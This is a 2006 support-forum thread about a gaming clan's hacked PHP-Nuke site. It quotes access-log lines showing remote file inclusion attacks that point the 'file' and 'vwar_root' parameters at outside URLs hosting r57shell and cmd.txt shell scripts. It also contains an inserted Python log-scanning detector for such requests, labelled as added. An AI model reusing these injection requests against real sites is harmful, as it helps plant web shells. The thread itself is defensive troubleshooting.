Ravens PHP Scripts: Forums
 

 

ivellios
New Member


Joined: Dec 02, 2006
Posts: 2

Posted: Thu Dec 07, 2006 11:33 am

Hi Guys!

I have been having some issues with my site lately, KZNClan.com. We are a BF2 gaming clan and love your distro.

I am running the latest distro of Raven, but I added vwar hiwire from phpnuke-clan. So far I am thinking that that is the problem. We continually get a 400 error message whenever we are leaving the homepage.

First, what is the best way to stop this from happening? Will it help to ban by country as I have seen suggested here?

Second, how can I fix this? I can manipulate the code after I figure out what I am looking for, but I am definitely not a script writer. So it usually takes me a few tries to figure out what the script I manipulate is doing. That is my level of experience.

Right now I am thinking that it would be best to upload new copies of everything and then transfer the site to that directory. Will this work?

Lastly, I have to do something quick before 1and1 shuts me down. While we have been busy these last 2 months, we love your product and feel badly about waiting so long to donate. If you can find the time to help me in this problem I will make sure to rectify this oversight and then some.

Here is a part of the e-mail from my host:

access.log.current:201.78.123.141 - - [07/Dec/2006:06:18:54 -0500] "GET /modules.php?name=News&file=http://schralprider.com/cp/agatsuma/CMD/r57shell.txt? HTTP/1.1" 200 71 s180249571.onlinehome.us "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pt-BR) Opera 8.54" "-"

access.log.current:72.232.53.210 - - [28/Nov/2006:13:30:24 -0500] "GET /modules/vwar/admin/admin.php?vwar_root=http://fuxed.by.ru/cmd.txt? HTTP/1.1" 200 609 [link hidden by forum] "-" "libwww-perl/5.805" "-"

If there is any more info you need, please let me know.
 
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

Posted: Thu Dec 07, 2006 1:10 pm

It appears from what you've posted that hackers may have used a hole in your system, perhaps one associated with vwar, to stick a shell script on your system. That's what the r57shell.txt thing is if I'm not mistaken. You might want to use your host's file manager via Vdeck or Cpanel or whatever you have to look thru all the directories and try to locate this and any similar files. Then get rid of them and any modules you've added.

Then, yes you can reload your distribution but it's not going to do any good to do this if you still have programs with security holes there. The hackers will still find them and exploit them.
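
Both requests in the host's e-mail share one trait: a query parameter (`file`, `vwar_root`) whose value is a full URL. The following is an added example, not part of the original thread, that scans an access log for that pattern. The sample lines are constructed with placeholder addresses and hosts, and the parser assumes plain Apache-style lines without the `access.log.current:` prefix.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in the same log shape as the host's e-mail. Addresses and
# hosts are documentation placeholders, not values taken from the thread.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Dec/2006:06:18:54 -0500] "GET /modules.php?name=News&file=http://files.example.net/a.txt? HTTP/1.1" 200 71 "-" "Mozilla/4.0"
198.51.100.7 - - [28/Nov/2006:13:30:24 -0500] "GET /modules/vwar/admin/admin.php?vwar_root=http%3A%2F%2Ffiles.example.net%2Fb.txt%3F HTTP/1.1" 200 609 "-" "libwww-perl/5.805"
203.0.113.5 - - [07/Dec/2006:07:00:01 -0500] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Dec/2006:07:02:11 -0500] "GET /modules.php?name=News&file=ftp://files.example.net/c.txt HTTP/1.1" 404 0 "-" "curl/7.15"
"""

# client, identd, user, [timestamp], "METHOD target protocol", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a URL is the trait both quoted requests share.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_remote_includes(log_text):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we can parse; skip rather than guess
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "ip": m["ip"], "time": m["ts"], "path": parts.path,
                    "param": param, "status": int(m["status"]),
                })
    return hits


if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        # A 2xx status does not prove the include ran, but those go first in triage.
        flag = "REVIEW FIRST" if 200 <= hit["status"] < 300 else "non-2xx"
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]} {hit["param"]}= -> {flag}')
```

The ordinary `file=viewtopic` request is not flagged, so normal module navigation does not show up in the results.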
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

Posted: Thu Dec 07, 2006 1:21 pm

"We continually get a 400 error message whenever we are leaving the homepage."

Hmm, what page is it going to? That generally doesn't indicate a hacker.

However, the logs provided do indicate a hack attempt. I'm not surprised if it was vWar that was attacked. It is possible your site may be compromised; your host will need to look at all processes on the server to see if any are malicious. I've seen a lot of bot scripts that will hide as innocent system processes like bash or ls.

ivellios
Posted: Fri Dec 08, 2006 12:01 am

Well if you go to our site and try to go anywhere but the homepage it will show you.

I can go to the admin file though.
 
evaders99
Posted: Fri Dec 08, 2006 9:26 am

Code:


INTERNAL SERVER ERROR

An internal server error has occured!


This is where you will need to go to your server's error logs or ask your host.
 
gregexp
The Mouse Is Extension Of Arm


Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

Posted: Fri Dec 08, 2006 5:41 pm

Hmm, is there anything writing to .htaccess?

Most of the time I personally have seen this error, it has been due to the .htaccess having something written in it that Apache conflicts with.

All previously mentioned advice will lead you to this if it is the case, but I thought I would drop it in just in case you're finding it difficult.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
All times are GMT - 6 Hours
 